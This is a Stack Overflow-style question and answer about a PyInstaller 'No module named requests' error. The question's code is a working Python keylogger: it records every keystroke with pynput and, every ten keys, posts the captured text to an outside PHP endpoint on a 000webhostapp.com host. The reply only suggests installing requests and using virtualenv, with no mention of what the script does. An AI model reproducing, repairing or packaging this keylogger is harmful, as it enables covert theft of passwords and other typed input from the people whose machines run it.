# No module requests found exe Window 10

Tags: python, module, pyinstaller, exe

When I convert this code with pyinstaller and run it as a exe in a window 10 vm it printed this error.

```
import pynput
import requests
import json

key_count = 0
keys = []

def on_press(key):
    global key_count
    global keys
    keys.append(str(key))
    key_count += 1
    if key_count >= 10:
        key_count = 0
        send_keys()

def send_keys():
    data = json.dumps({'key_data': ''.join(keys)})
    headers = {'Content-type': 'application/json'}
    keys.clear()
    url = 'https://000webhostapp.com/dog.php'
    try:
        response = requests.post(url, data=data, headers=headers)
        response.raise_for_status()
    except requests.exceptions.RequestException as e:
        print(f'Error: {e}')
    else:
        print('Data sent successfully')

with pynput.keyboard.Listener(on_press=on_press) as listener:
    listener.join()
```

[enter image description here](https://i.stack.imgur.com/yFwoD.png)

Need help Thank you in advance

I try to force to convert the python code with command to include the module but didnt work I dont know what to do.

Thank you

Comment: please include the pyinstaller command you use to create the executable

Answer (score 0):

as far as I see from what you said, you are not using any virtualenv. You installed python directly on your computer and started using the script.

The Requests library is not one of the libraries that come with python by default.

To install;

```py
    python -m pip install requests
```

"What is virtualenv and how to use it?" To find an answer to the question with the example of the requests library;
https://docs.python-guide.org/dev/virtualenvs/